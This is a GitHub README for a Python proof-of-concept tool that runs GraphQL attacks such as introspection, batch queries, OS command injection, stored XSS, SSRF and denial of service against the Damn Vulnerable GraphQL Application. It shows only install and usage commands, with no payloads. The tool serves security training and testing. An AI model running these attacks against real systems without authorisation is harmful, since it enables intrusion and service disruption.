Skip to content

Latest commit

 

History

History
91 lines (66 loc) · 3.09 KB

README.md

File metadata and controls

91 lines (66 loc) · 3.09 KB

GraphQL Exploitation PoC Tool

Overview

This tool is designed to test and explore vulnerabilities in GraphQL applications. It allows users to perform various types of attacks and retrieve information about the GraphQL schema. The tool also includes references to the OWASP Top Ten vulnerabilities to educate users about common security risks.

Acyber Team Developer

Automatic PoC For Damn Vulnerable GraphQL Application.

Features

  • Perform GraphQL introspection to discover the schema.
  • Execute batch queries to test multiple endpoints.
  • Test for OS Command Injection vulnerabilities.
  • Conduct Stored Cross-Site Scripting (XSS) tests.
  • Analyze resource-intensive queries.
  • Simulate Denial of Service (DoS) attacks.
  • Check for field duplication vulnerabilities.
  • Test for Server-Side Request Forgery (SSRF).
  • Send custom GraphQL requests.

OWASP Top Ten Vulnerabilities

The tool provides information about the OWASP Top Ten vulnerabilities:

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Installation

To run this tool, you need to have Python 3.x installed. You can download it from the official Python website.

Dependencies

Install the required libraries using pip:

pip install requests colorama

Usage

Run the tool with the following command:

python3 graphql_poc.py -u <GraphQL_endpoint_URL> -p <Proxy_URL>

Arguments

-u / --url: The GraphQL endpoint URL you want to test. -p / --proxy: (Optional) The proxy URL for intercepting requests (e.g., http://127.0.0.1:8080).

Example

python3 graphql_poc.py -u http://example.com/graphql -p http://127.0.0.1:8080

Attack Types

After running the tool, you will be prompted to select an attack type:

  • GraphQL Introspection: Discover the GraphQL schema.
  • Batch Query Attack: Send multiple queries at once.
  • OS Command Injection: Test for command injection vulnerabilities.
  • Stored Cross-Site Scripting (XSS): Test for stored XSS vulnerabilities.
  • Resource Intensive Query: Test a resource-intensive query.
  • Denial of Service Attack: Simulate a DoS attack.
  • Field Duplication Attack: Test for duplicate fields in queries.
  • Server-Side Request Forgery (SSRF): Test for SSRF vulnerabilities.
  • Custom GraphQL Request: Send a custom GraphQL request.

Contributing

Contributions are welcome! If you have suggestions for improvements or new features, please open an issue or submit a pull request.

Related Project

For a vulnerable GraphQL application to test against, check out the Damn Vulnerable GraphQL Application. Damn Vulnerable GraphQL Application

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes and ethical hacking only. Use it responsibly and only on systems you have permission to test.